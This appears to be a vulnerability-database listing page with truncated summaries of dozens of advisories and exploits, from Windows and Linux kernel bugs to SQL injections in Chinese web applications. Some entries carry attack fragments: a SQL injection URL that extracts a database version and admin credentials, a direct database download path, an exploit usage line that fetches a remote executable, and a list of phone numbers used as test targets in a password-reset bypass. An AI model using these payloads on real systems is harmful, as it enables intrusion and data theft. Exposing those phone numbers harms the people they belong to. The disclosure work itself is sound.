NetBSD Multiple Local Information Disclosure Vulnerabilities
NetBSD is an open-source operating system. NetBSD does not filter kernel memory before returning it to user space; a local attacker can exploit this to obtain sensitive kernel information. No detailed vulnerability information is currently available. NetBSD NetBSD 3.0.1 NetBSD NetBSD 3.0 NetBSD NetBSD 2.1 NetBSD NetBSD 2.0.3 NetBSD NetBSD 2.0.2 NetBSD NetBSD 2.0.1 NetBSD NetBSD 2.0 NetBSD NetBSD Current NetBSD NetBSD 3,1RC1 NetBSD NetBSD 2.1.1 NetBSD NetBSD 2.0.4...
GNU Tar GNUTYPE_NAMES Remote Directory Traversal Vulnerability
GNU tar creates and extracts tar archives and performs various archive management tasks. GNU tar fails to properly handle possible symbolic links when processing certain records; a remote attacker could exploit this vulnerability to create files at arbitrary locations on the user's machine. The extract_archive function in tar's extract.c and the extract_mangle function in mangle.c process GNUTYPE_NAMES records that contain symbolic links. If a user is tricked into opening a specially crafted tar file, arbitrary files can be overwritten. GNU tar 1.16 GNU tar 1.15.1 The vendor has not yet released a patch or upgrade; we recommend that users of this software monitor the vendor's home page for the latest version:...
Microsoft Windows 2000 Kernel Local Privilege Escalation Vulnerability (MS06-049)
Microsoft Windows is a very popular operating system published by Microsoft. A local attacker can exploit an unchecked buffer in the Microsoft Windows 2000 kernel to escalate privileges and take complete control of the affected system. Microsoft Windows 2000 SP4 Microsoft has released a security bulletin (MS06-049) and a corresponding patch: MS06-049: Vulnerability in Windows Kernel Could Result in Elevation of Privilege 920958...
Microsoft Outlook Web Access 'owalogon.asp' URL Redirection Vulnerability
Microsoft Exchange Server is an enterprise-class mail server. Microsoft Outlook Web Access has a flaw in its URL handling; a remote attacker can exploit this vulnerability to redirect to arbitrary URLs. By constructing a special URL, an attacker can redirect users to an arbitrary URL, luring them to a page that may capture and transmit passwords, download arbitrary files, and so on. Microsoft Outlook 2003 The vendor has not yet released a patch or upgrade; we recommend that users of this software monitor the vendor's home page for the latest version: http://www.microsoft.com/technet/security/ Donnie...
MS Windows WebDAV Remote PoC Exploit
No description provided by source. // / IIS 5.0 WebDAV -Proof of concept- / / Bug: CAN-2003-0109 / / By Roman Medina-Heigl Hernandez / / aka RoMaNSoFt [email protected] / / Madrid, 23.Mar.2003 / / ================================= / / Public release. Version 1. / / -------------------------------...
MS Internet Explorer (MDAC) Remote Code Execution Exploit (MS06-014)
No description provided by source. #!/bin/sh - "exec" "python" "-O" "$0" "$@" __doc__ = """BL4CK - MS06-014 RDS.DataStore - Data Execution CVS-2006-0003 MS06-014 April 2006 this is a bit out-dated, but works very well Usage: ./bl4ckms06014.py http://omfg.what.ho.st/user/stage2.exe index.html Now uploa...
Linux Kernel 2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit
No description provided by source. // / Local r00t Exploit for: / / Linux Kernel PRCTL Core Dump Handling / / BID 18874 / CVE-2006-2451 / / Kernel 2.6.x = 2.6.13 && 2.6.17.4 / / By: / / - dreyer [email protected] main PoC code / / - RoMaNSoFt [email protected] local root code / / 10.Jul.2006 / //...
Clansys <= v.1.1 (index.php page) PHP Code Insertion Vulnerability
No description provided by source. NukedX Security Advisory Nr 2006-29 ClanSys v1.1 index.php page PHP Code Insertion Vulnerability Method found & Exploit scripted by nukedx Contacts ICQ: 10072 MSN/Main: [email protected] web: www.nukedx.com Original advisory: http://www.nukedx.com/?viewdoc=29...
New burnOverflow Bug Identified in Multiple ERC20 Smart Contracts (CVE-2018-11239)
Our vulnerability-scanning system at PeckShield has so far discovered several dangerous smart contract vulnerabilities: batchOverflow, proxyOverflow, transferFlaw, ownerAnyone, multiOverflow. Some of them could be used by attackers to generate tokens out of nowhere while others can be used to...
New multiOverflow Bug Identified in Multiple ERC20 Smart Contracts (CVE-2018-10706)
Our vulnerability-scanning system at PeckShield has so far discovered several dangerous smart contract vulnerabilities batchOverflow, proxyOverflow, transferFlaw, ownerAnyone. Some of them could be used by attackers to generate tokens out of nowhere while others can be used to steal tokens from...
DJI Spark hijacking
It is not a pleasant experience for anyone to have valuable property, bought with money earned with blood, sweat, and tears, stolen by some unknown cybercriminal. The Internet of Things (IoT) is developing at a rapid pace, and the devices that can be controlled remotely...
CloudMe Unauthenticated Remote Buffer Overflow(CVE-2018-6892)
The following advisory describes one (1) vulnerability found in CloudMe. CloudMe is “a file storage service operated by CloudMe AB that offers cloud storage, file synchronization and client software. It features a blue folder that appears on all devices with the same content, all files are...
OpenNMS Java Object Deserialization RCE
#!/usr/bin/env python3 Credits: http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/opennms nessus/plugins/opennmsjavaserialize.nasl cobbled together by pancho import socket import sys def buildcmd:...
Asus Unauthenticated LAN Remote Command Execution
Vulnerabilities Summary The following advisory describes two (2) vulnerabilities found in AsusWRT Version 3.0.0.4.380.7743. The combination of the vulnerabilities leads to LAN remote command execution on any Asus router. AsusWRT is “THE POWERFUL USER-FRIENDLY INTERFACE – The enhanced ASUSWRT...
Telesquare SKT LTE Router SDT-CS3B1 Remote Reboot Denial Of Service
Summary We introduce SDT-CS3B1 LTE router which is a SKT 3G and 4G LTE wireless communication based LTE router product. Description The router suffers from an unauthenticated reboot command execution. Attackers can exploit this issue to cause a denial of service scenario. /lte/lteuicc.shtml: 858:...
libxls read_MSAT Code Execution Vulnerability(CVE-2017-2897)
Summary An exploitable out-of-bounds write vulnerability exists in the read_MSAT function of libxls 1.4. A specially crafted XLS file can cause a memory corruption resulting in remote code execution. An attacker can send a malicious XLS file to trigger this vulnerability. Tested Versions libxls 1.4...
Microsoft IE11: use-after-free in jscript!JsErrorToString(CVE-2017-11810)
There is a use-after-free in jscript.dll library that can be exploited in IE11. jscript.dll is an old JavaScript library that was used in IE 8 and back. However, IE11 can still load it if put into IE8 compatibility mode and if there is a script tag that can only be understood by the older library...
Cesanta Mongoose DNS Query Compressed Name Pointer Denial Of Service(CVE-2017-2909)
Summary An infinite loop programming error exists in the DNS server functionality of Cesanta Mongoose 6.8 library. A specially crafted DNS request can cause an infinite loop resulting in high CPU usage and Denial Of Service. An attacker can send a packet over network to trigger this vulnerability...
Cesanta Mongoose MQTT SUBSCRIBE Multiple Topics Remote Code Execution(CVE-2017-2894)
Summary An exploitable stack buffer overflow vulnerability exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. A specially crafted MQTT SUBSCRIBE packet can cause a stack buffer overflow resulting in remote code execution. An attacker needs to send a specially crafted MQTT...
Ruby TclTkIp ip_cancel_eval Type Confusion Vulnerabilities(CVE-2016-2337)
DESCRIPTION Type Confusion exists in canceleval Ruby's TclTkIp class method. Attacker passing different type of object than String as "retval" argument can cause arbitrary code execution. TESTED VERSIONS Ruby 2.3.0 dev Ruby 2.2.2 Tcl/Tk8.6 or later PRODUCT URLs https://www.ruby-lang.org DETAILS...
Microsoft Windows Kernel Local Information Disclosure Vulnerability(CVE-2017-11817)
This tracker entry is a fork of issue 1325, which this bug was reported as a part of. However, as some essential information and context was provided in issue 1325, the "Reported" date was adjusted there to account for it. The new information did not concern the vulnerability discussed here, so w...
Libbpg BPG image decoding Code Execution Vulnerability(CVE-2016-8710)
Summary An exploitable heap write out of bounds vulnerability exists in the decoding of BPG images in libbpg library. A crafted BPG image decoded by libbpg can cause an integer underflow vulnerability causing an out of bounds heap write leading to remote code execution. This vulnerability can be...
WebKit: heap-buffer-overflow in WebCore::RenderSearchField::addSearchResult(CVE-2017-7049)
There is a heap buffer overflow in WebKit. The vulnerability was confirmed on an ASan build of WebKit nightly. PoC: ================================================================= function go() { i.value = "1"; i.type = "search"; f.submit();...
Microsoft Windows Uniscribe Information Disclosure Vulnerability(CVE-2017-0284)
We have encountered a crash in the Windows Uniscribe user-mode library, in the USP10!ttoGetTableData function, while trying to display text using a corrupted TTF font file: --- 210.274: Access violation - code c0000005 first chance First chance exceptions are reported before any exception handlin...
Apple iOS / MacOS Netagent Kernel Memory Disclosure(CVE-2017-2507)
iOS/MacOS kernel memory disclosure due to lack of bounds checking in netagent socket option handling netagentctlsetopt is the setsockopt handler for netagent control sockets. Options of type NETAGENTOPTIONTYPEREGISTER are handled by netagenthandleregistersetopt. Here's the code: static errnot...
WebKit: UXSS through HTMLObjectElement::updateWidget(CVE-2017-2493)
When an object element loads a JavaScript URL (e.g., javascript:alert(1)), it checks whether it violates the Same Origin Policy or not. Here are some snippets of the logic. void HTMLObjectElement::updateWidget(CreatePlugins createPlugins) ... String url = this->url(); ... if (!allowedToLoadFrameURL(url)) return;...
Windows Kernel win32k.sys multiple bugs in the NtGdiGetDIBitsInternal system call (CVE-2017-0058)
We have discovered two bugs in the implementation of the win32k!NtGdiGetDIBitsInternal system call, which is a part of the graphic subsystem in all modern versions of Windows. The issues can potentially lead to kernel pool memory disclosure (bug 1) or denial of service (bugs 1 and 2). Under certain...
MacOS/iOS kernel uaf due to bad locking in necp_open (CVE-2017-2478)
necp_open is a syscall used to obtain a new necp file descriptor. The necp file's fp's fg_data points to a struct necp_fd_data allocated on the heap. Here's the relevant code from necp_open: error = falloc(p, &fp, &fd, vfs_context_current()); --------------------- (a) if (error != 0) goto done; if ((fd_data =...
Huawei Flybox B660 Router Authentication Bypass Vulnerability
The Huawei Flybox B660 router contains an authentication bypass vulnerability. Because of a flaw in the local path "./htmlcode/html/" module and the "indexdefault.asp" file, a remote unauthenticated attacker could exploit the...
Nongyou Government Affairs System (农友政务系统) /ckq/slview.aspx CountryName Parameter SQL Injection Vulnerability
No description provided by source...
Wanhu Office OA Platform (万户办公OA平台) jigeObj.jsp RecordID Parameter SQL Injection Vulnerability
No description provided by source...
HP Printer Devices HP Color LaserJet Series Unauthorized Access Vulnerability
No description provided by source...
Jixian OA System (极限OA系统) /logincheck.php SQL Injection Vulnerability
No description provided by source...
Fujian Strongsoft Disaster Warning System (福建四创灾害预警系统) /Disaster/ReportCount.aspx tabnm Parameter SQL Injection Vulnerability
0x01 Framework Introduction Strongsoft (四创软件) is a Chinese provider of disaster prevention and mitigation information and application services, and the leading domestic enterprise in information-based disaster prevention. Affected vendor: Fujian Strongsoft Software Co., Ltd. (福建四创软件有限公司) Official homepage: http://www.strongsoft.net Google search: intitle:预警 系统 技术支持:福建四创 0x02 Exploitation Injection URL: /Disaster/ReportCount.aspx?tabnm=1 Injection parameter: tabnm [Get database version] /Disaster/ReportCount.aspx?tabnm=1%27%2bselect+1+where+1=convertint,@@version%2b%27 [Administrator account and password]...
shop7z Mall System /Advsearchadmin.asp kindnum Parameter SQL Injection Vulnerability
0x01 Vulnerability Summary Because the kindnum parameter at Advsearchadmin.asp in the shop7z mall system is insufficiently filtered, a SQL injection vulnerability exists in kindnum. A remote attacker can exploit this vulnerability to execute arbitrary SQL statements. 0x02 Vulnerability Analysis The Advsearchadmin.asp code is as follows: kindnum=trim(request("kindnum")) pipai=trim(request("pipai")) model=trim(request("model")) productname=trim(request("productname")) price11=trim(request("price11"))...
zTree Cross-Site Scripting Vulnerability
No description provided by source...
Multiple EMC RSA Products ESA-2015-081 Multiple Security Vulnerabilities
Affected products: RSA BSAFE Micro Edition Suite MES all 4.1.x versions prior to 4.1.3 RSA BSAFE Micro Edition Suite MES all 4.0.x versions prior to 4.0.8 RSA BSAFE Crypto-C Micro Edition Crypto-C ME 4.1 RSA BSAFE Crypto-C Micro Edition Crypto-C ME all versions prior to 4.0.4 RSA BSAFE Crypto-J all versions...
Kingdee Xiaoguanjia (金蝶销管家) Logic Flaw Allows Resetting Any User's Password (tested with staff accounts / instant change)
Brief description: The CAPTCHA can be bypassed to change a user's password directly. Details: 0x1: First, collect some staff accounts for testing, to demonstrate the severity of the vulnerability. 13580111111 13752248075 13456231475 13456879564 15578945623 13456231245 13456231245 13648776985 13400002111 13625668852 15018517663 15915533696 13888888888 13456789123 18090700000 13165454756 13654213923 13654213923 13760368754...
Apabi Library System POST SQL Injection
Brief description: One SQL injection vulnerability. Details: Vendor: http://www.apabi.cn Beijing Founder Apabi Technology Co., Ltd. (北京方正阿帕比技术有限公司) SQL injection point: /bbs/bbssearch.asp?lang=gb POST: key=1 where the key parameter is vulnerable to SQL injection. Microsoft OLE DB Provider for SQL Server 错误 '80040e14' 第 1 行: '%' 附近有语法错误。 D:\PROGRAM FILES\FOUNDER\DLIBRARY\ROOT\BBS....\Include\ClassBBS.Inc.asp,行 60 Five cases automatically collected from the Internet:...
Mirapoint /cgi-bin/licenses.cgi Backdoor Vulnerability
No description provided by source...
KesionCMS X1 /KS_Data/KesionCMSX1.mdb Database Disclosure Vulnerability
The default database file KesionCMSX1.mdb in the KS_Data directory can be downloaded directly by an attacker. Exploitation: access the URL http://127.0.0.1/KS_Data/KesionCMSX1.mdb #!/usr/bin/env python # coding=utf-8 # test: import urllib2 from comm import cmdline from comm import generic pocinfo = { 'VulId' : '1503', # webvul ID number 'Name' : 'KesionCMS X1 /KS_Data/KesionCMSX1.mdb 数据库发现漏洞...
Innovaphone PBX Admin-GUI - CSRF Vulnerability
No description provided by source. Title: Innovaphone PBX Admin-GUI CSRF Impact: High CVSS2 Score: 7.8 AV:N/AC:M/Au:S/C:P/I:C/A:C/E:F/RL:U/RC:C Announced: August 21, 2014 Reporter: Rainer Giedat NSIDE ATTACK LOGIC GmbH, www.nsideattacklogic.de Products: Innovaphone PBX Administration GUI Affected...
XDCMS 3.0.1 /system/modules/xdcms_login.php SQL Injection Vulnerability
No description provided by source...
Blender 2.34, 2.35a, 2.4, 2.49b .blend File Command Injection
No description provided by source. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs/ Blender .blend Project Arbitrary Command Execution 1. Advisory Information Title: Blender .blend Project Arbitrary Command Executio...
Photodex ProShow Gold/Producer 5.0.3310 & 6.0.3410 - ScsiAccess Local Privilege Escalation
No description provided by source. Exploit-DB Note: Vuln still in 6.0.3410 as well as 'Photodex ProShow Gold' Inshell Security Advisory http://www.inshell.net 1. ADVISORY INFORMATION ----------------------- Product: Photodex ProShow Producer Vendor URL: www.photodex.com Type: Incorrect Default...
MS Windows 2000/NT 4/XP Network Share Provider SMB Request Buffer Overflow (1)
No description provided by source. source: http://www.securityfocus.com/bid/5556/info Microsoft Windows operating systems use the Server Message Block (SMB) protocol to support services such as file and printer sharing. A buffer overflow vulnerability has been reported in the handling of some...
OpenSSL - Remote DoS
No description provided by source. / hoagieopensslrecordofdeath.c OPENSSL REMOTE DENIAL-OF-SERVICE EXPLOIT - OpenSSL 0.9.8m short = 16 bit - OpenSSL 0.9.8f through 0.9.8m short != 16 bit CVE-2010-0740 Bug discovered by: Bodo Moeller and Adam Langley Google Philip Olausson [email protected]...
Max's Image Uploader Shell Upload Vulnerability
An unrestricted file upload vulnerability exists in maxImageUpload/index.php in PHP F1 Max's Image Uploader 1.0. When Apache is not configured to handle the MIME type of files with a pjpeg or jpeg extension, a remote attacker can execute arbitrary code by uploading a file with a pjpeg or jpeg extension and then accessing it through a direct request to original/. The problem is in function uploadImage in maxImageUpload.class.php: $result = true; if (!isset($_POST['submitBtn'])) $this->showUploadForm(); else $m...
McMurtrey/Whitaker & Associates Cart32 3.0/3.1/3.5 Path Disclosure Vulnerability
No description provided by source. source : http://www.securityfocus.com/bid/1932/info Cart32 is a shopping cart application for e-commerce enabled sites. Cart32 contains a vulnerability which reveals server information. Requesting a specially crafted URL, by way of the CGI application, will reve...
Dotproject 2.0 /modules/projects/gantt2.php dPconfig[root_dir] Parameter Remote File Inclusion
No description provided by source. source: http://www.securityfocus.com/bid/16648/info Dotproject is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit these issues to includ...